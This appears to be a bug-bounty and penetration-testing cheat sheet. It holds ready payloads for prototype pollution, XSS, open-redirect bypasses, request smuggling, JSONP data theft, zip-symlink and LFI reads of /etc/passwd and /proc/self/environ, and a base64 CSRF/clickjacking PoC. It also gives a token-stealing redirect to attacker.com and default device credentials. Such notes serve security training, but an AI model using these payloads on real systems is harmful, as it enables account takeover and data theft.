Login exploits

While registering account, try to append a space at the end of already registered email to attempt user account takeover(db removes trailing space while inserting however application not).

If email maximum length is fixed and characters after allowed length are stripped, try to register an email having spaces appended till maximum character length + any character at end, eg <admin@htb.com      #>. 

OAuth + open-redirect to Account takeover

If redirect uri in oauth login allows to append characers at the end, the attacker can use below pattern combined with open redirect to steal token or code.

https://abc.com?redirect_uri=http://target.com/oauth/../../../open-redirect?next=attacker.com

Unicode Collisions

unicode characters collide with few english characters. This fact can be used to exploit functionalities like - when Forgot password emails validated against lowercase/uppercase value on file, but sent to the provided input email.

// https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/

//uppercase scenario
chr(0x017f).upper()=='S'	# returns True
chr(0x0131).upper()=='I'

// lowercase scenario
chr(0x212A).lower()=='k'

Javascript prototype pollution

Using this bug, we can set new properties of objects. Eg- we can set json object {“user”:”test”} new property admin=true if server takes json data and sets attributes using it.

payload {"user":"test","__proto__":{"admin":true}}

a={}
b=1
c='ds'

# polluting prototype
a.__proto__.foo='bar'

# All objects have foo property now with value bar
d=new Object
d.foo=='bar'	# true
b.foo=='bar'	# true

Universal Plug and Play UPnP

Windows Device Portal - port 8080

Windows IoT Core devices support a special webserver called the Device Portal. Windows Device Portal runs on port 8080 in Development mode and has default credentials as Administrator and p@ssw0rd (zero).

RCE can be acheived using the vulnerability in Sirep/WPCon communications protocol included with Windows IoT operating system.
```
  // git clone the repo
  https://github.com/SafeBreach-Labs/SirepRAT
```
CallStranger(CVE-2020-12695) Vulnerability - port 37215

The vulnerability – CallStranger – is caused by Callback header value in UPnP SUBSCRIBE function can be controlled by an attacker and enables an SSRF-like vulnerability.
```
  // git clone the repo
  https://github.com/yunuscadirci/CallStranger
```

Zip Symlink

If zip files can be uploaded and content is accessible. Try to access local files using this bug.

mkdir test
cd test
ln -s /etc/passwd link.txt
cat link.txt 		# prints content of /etc/passwd
zip --symlinks -r test.zip test/
unzip -l test.zip

Flask Template Injection SSTI

Check with basic template injection payload and if it evaluates, try to further exploit it. May be it reflects at multiple places, make sure to check them all.

https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

	#see config items

#Get subprocess.Popen object using mro(parent) and subclasses

#Execute command

Request Smuggling

Pass both content-length and Transfer-Encoding header when posting data to an endpoint. Try CL-TE, TE-CL and TE-TE attack.

Make sure to change connection header to keep-alive. Also use mandatory headers like Host, user-agent and cookie to avoid server discarding the request. For post request, use content-length and content-type header as well.

Remember Transfer encoding uses hex numbers to represent chunk size.

## CL-TE example (CL frontend, TE backend)

Content-Length: 50
Transfer-Encoding:chunked

0

POST /404 HTTP/1.1
Host: 10.10.14.93
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Cookie: session=abcd

msg=abc

JsonP

Check if website returns sensitive json data. If so, try to append query parameter jsonp or callback and see if jsonp is supported.

Jsonp exploit works in firefox only.

<script>
      userinfo = function (data) {
      alert(JSON.stringify(data));
      };  
</script>
<script src="https://www.bugbountytraining.com/challenges/challenge-15.php?jsonp=userinfo" type="text/javascript"></script>
 Challenge hints
(click to reveal)
 Guides
Understanding Application/Business Logic vulnerabilities

Open Redirect (Bypass)

# %E3%80%82 is equivalent to dot (.)
redirectUri=http://example%E3%80%82com#.bugbountyhunter.com
redirectUrl=/%0d/example.com/
redirectUri=https://example.com#.target.com/
redirectUri=https://example.com/.target.com/
redirectUri=https://example.com\.target.com/
redirectUri=https://example.com?.target.com/

XSS (bypass events)

onpointerrawupdate='alert(0)'
onmouseleave='alert(0)'

Redirect token stealing

If a website uses multiple cookies, try to visit login page after deleting one cookie(csrf/sso token) at a time. In many cases, it appends the token to the redirect url if user is authenticated. Try common params like return, returnTo, goto, next, continue, etc and see if you can steal the token(applications usually set token in get request when it expires).

Finding Juicy assets

Search domain in github.com and see if you get any dev or quality assets. May be the endpoints and parameters are same in all environments.

XSS using name attribute

If you control href/src value, you may be able to write custom html to page. When using the javascript pseudo scheme, if the returned value is a string, browsers will write it onto the page like document.write.

data:text/html,<iframe name="<svg onload=alert(document.domain)>" src=https://www.bugbountytraining.com/challenges/challenge-6.php?url=javascript:name>

LFI

cat /proc/version
cat /etc/issue
cat /proc/self/environ
cat /proc/net/tcp	# listening processes tcp
cat /proc/net/udp	# listening processes udp

CSRF + Clickjacking

If post form without csrf-token autofills the mandatory fields and is framable, it is possible to exploit CSRF using clickjacking.

X-Frame deny header can be bypassed using iframe sometimes. Consider this while checking for framable response.

POC on firefox (send empty csrf form and see response in iframe using target attribute of form, the response has autofilled attributes which includes csrf token, use clickjack to submit it)

<iframe src="data:text/html;base64,PGZvcm0gbmFtZT0iY3NyZmZvcm0iIHRhcmdldD0ibXlmb3JtIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iaHR0cHM6Ly93d3cuYnVnYm91bnR5dHJhaW5pbmcuY29tL2NoYWxsZW5nZXMvY2hhbGxlbmdlLTMucGhwIj4gCjxpbnB1dCB0eXBlPSJlbWFpbCIgbmFtZT0idXNlcm5hbWUiIHZhbHVlPSJleGFtcGxlQGdtYWlsLmNvbSI+CjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwYXNzd29yZCIgdmFsdWU9ImV4YW1wbGUxMjMiPgo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY3NyZi10b2tlbiIgdmFsdWU9IiI+CjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJTZW5kIj4KPC9mb3JtPgoKPGRpdiBzdHlsZT0ib3ZlcmZsb3c6IGhpZGRlbjsgd2lkdGg6IDE1MXB4OyBoZWlnaHQ6IDUxcHg7IHBvc2l0aW9uOiByZWxhdGl2ZTsiIGlkPSIiPgo8aWZyYW1lIG5hbWU9Im15Zm9ybSIgaWQ9Im15Zm9ybSIgc3JjPSJodHRwczovL3d3dy5idWdib3VudHl0cmFpbmluZy5jb20vY2hhbGxlbmdlcy9jaGFsbGVuZ2UtMy5waHAiIHN0eWxlPSJib3JkZXI6IDBwdCBub25lIDsgbGVmdDogLTYwOXB4OyB0b3A6IC00NDBweDsgcG9zaXRpb246IGFic29sdXRlOyB3aWR0aDogMTM2NnB4OyBoZWlnaHQ6IDY1NHB4OyI+PC9pZnJhbWU+PC9kaXY+"></iframe>

OSCP-notes

Let's try harder...